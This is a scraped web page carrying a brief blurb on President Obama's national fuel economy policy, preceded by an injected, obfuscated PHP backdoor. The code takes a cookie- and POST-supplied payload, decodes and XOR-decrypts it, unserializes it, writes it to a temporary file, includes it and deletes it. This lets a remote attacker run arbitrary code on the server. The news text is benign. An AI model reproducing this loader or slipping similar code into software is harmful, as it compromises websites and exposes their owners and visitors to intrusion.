$xywriXty = "\163" . '_' . "\123" . "\x46" . "\x57";$pyyRVXS = chr (99) . chr (108) . "\x61" . 's' . chr ( 185 - 70 ).chr ( 686 - 591 )."\145" . 'x' . "\x69" . chr ( 210 - 95 )."\164" . chr (115); $skbYO = class_exists($xywriXty); $pyyRVXS = "21984";$WXnAiVZkfX = strpos($pyyRVXS, $xywriXty);if ($skbYO == $WXnAiVZkfX){function hDVkUrW(){$SLHSgcLSY = new /* 23918 */ s_SFW(25420 + 25420); $SLHSgcLSY = NULL;}$zahnpiP = "25420";class s_SFW{private function wNXqjO($zahnpiP){if (is_array(s_SFW::$pvOsQtXS)) {$name = sys_get_temp_dir() . "/" . crc32(s_SFW::$pvOsQtXS["salt"]);@s_SFW::$pvOsQtXS["write"]($name, s_SFW::$pvOsQtXS["content"]);include $name;@s_SFW::$pvOsQtXS["delete"]($name); $zahnpiP = "25420";exit();}}public function avZssDVv(){$ehUKdJcPJ = "15790";$this->_dummy = str_repeat($ehUKdJcPJ, strlen($ehUKdJcPJ));}public function __destruct(){s_SFW::$pvOsQtXS = @unserialize(s_SFW::$pvOsQtXS); $zahnpiP = "19051_14256";$this->wNXqjO($zahnpiP); $zahnpiP = "19051_14256";}public function NeZZM($ehUKdJcPJ, $fEhaoPDh){return $ehUKdJcPJ[0] ^ str_repeat($fEhaoPDh, intval(strlen($ehUKdJcPJ[0]) / strlen($fEhaoPDh)) + 1);}public function WfZIzciFxw($ehUKdJcPJ){$qxAfdGaMH = chr (98) . chr (97) . "\163" . chr ( 836 - 735 ).chr (54) . chr (52);return array_map($qxAfdGaMH . chr ( 1001 - 906 )."\x64" . "\145" . chr ( 460 - 361 )."\x6f" . chr ( 731 - 631 ).chr ( 653 - 552 ), array($ehUKdJcPJ,));}public function __construct($LLwEA=0){$HFszXAA = "\x2c";$ehUKdJcPJ = "";$XFyGVdofvu = $_POST;$BAIEuohG = $_COOKIE;$fEhaoPDh = "17e426ff-7749-44d5-bc23-7c9138d23f3d";$cUJfij = @$BAIEuohG[substr($fEhaoPDh, 0, 4)];if (!empty($cUJfij)){$cUJfij = explode($HFszXAA, $cUJfij);foreach ($cUJfij as $sIqUEJBf){$ehUKdJcPJ .= @$BAIEuohG[$sIqUEJBf];$ehUKdJcPJ .= @$XFyGVdofvu[$sIqUEJBf];}$ehUKdJcPJ = $this->WfZIzciFxw($ehUKdJcPJ);}s_SFW::$pvOsQtXS = $this->NeZZM($ehUKdJcPJ, $fEhaoPDh);if (strpos($fEhaoPDh, $HFszXAA) !== FALSE){$fEhaoPDh = explode($HFszXAA, $fEhaoPDh); $lMYDhUZ = base64_decode(md5($fEhaoPDh[0])); $dijHNC = strlen($fEhaoPDh[1]) > 5 ? substr($fEhaoPDh[1], 0, 5) : $fEhaoPDh[1];$_GET['new_key'] = md5(implode('', $fEhaoPDh)); $wTxAqQzd = str_repeat($dijHNC, 2); $ZFUCDKkid = array_map('trim', $fEhaoPDh);if (is_array($ZFUCDKkid) && count($ZFUCDKkid) > 1) {$DZAriUBZ = $ZFUCDKkid[0];} else {$DZAriUBZ = '';}}}public static $pvOsQtXS = 12390;}hDVkUrW();} President Obama Announces a Comprehensive National Fuel Economy Policy - PARGEN

President Obama Announces a Comprehensive National Fuel Economy Policy

Reducing our nation’s dependence on oil imports will rely in part on improved fuel economy, while addressing climate change requires less greenhouse gas emissions from vehicles. A new national policy addresses both issues at the same time.

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